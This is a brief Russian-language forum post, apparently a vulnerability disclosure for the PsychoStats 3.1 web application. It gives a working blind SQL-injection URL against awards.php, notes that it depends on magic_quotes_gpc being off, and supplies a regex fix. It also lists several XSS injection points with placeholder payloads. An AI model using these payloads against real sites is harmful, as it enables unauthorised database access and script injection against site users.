![]() |
PsychoStats
Продукт: PsychoStats 3.1 http://www.psychostats.com/
Уязвимость: Blind SQL-injection Описание: файл awards.php PHP код:
Эксплойт: Код:
/awards.php?d=2009-12-01'+and+0+union+select+1%23Зависимости: magic_quotes_gpc = off Решение: замена паттерна на следующий "/^\d\d\d\d-\d\d?-\d\d?$/" XSS'ки: /query.php?s=[XSS] /ajax/flaglist.php?id='%3E[XSS] (работает только для зареганных) /ajax/iconlist.php?id='%3E[XSS] (работает только для зареганных) /admin/login.php?ref=%22%3E[XSS] |
Вроде в роа уже была тема с психостатом.
|
| Время: 21:40 |